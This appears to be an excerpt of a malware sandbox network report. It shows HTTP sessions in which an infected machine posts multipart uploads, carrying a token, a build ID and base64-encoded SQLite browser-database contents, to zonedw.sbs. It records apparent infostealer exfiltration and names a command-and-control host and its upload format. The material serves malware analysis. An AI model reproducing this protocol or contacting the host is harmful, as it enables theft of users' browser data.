41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:34 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	50086	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:35 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:35 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 Data Ascii: ------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------PHLFC2NGVAAIEUSR9RI5Cont
2024-12-14 11:57:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:36 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	50095	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:38 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 Data Ascii: ------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AS2N7900ZU3EUA1VAI5FCont
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:38 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-14 11:57:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	50100	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:39 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HVKXB16P8YMYMYM7YUKX User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:39 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 56 4b 58 42 31 36 50 38 59 4d 59 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 48 56 4b 58 42 31 36 50 38 59 4d 59 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 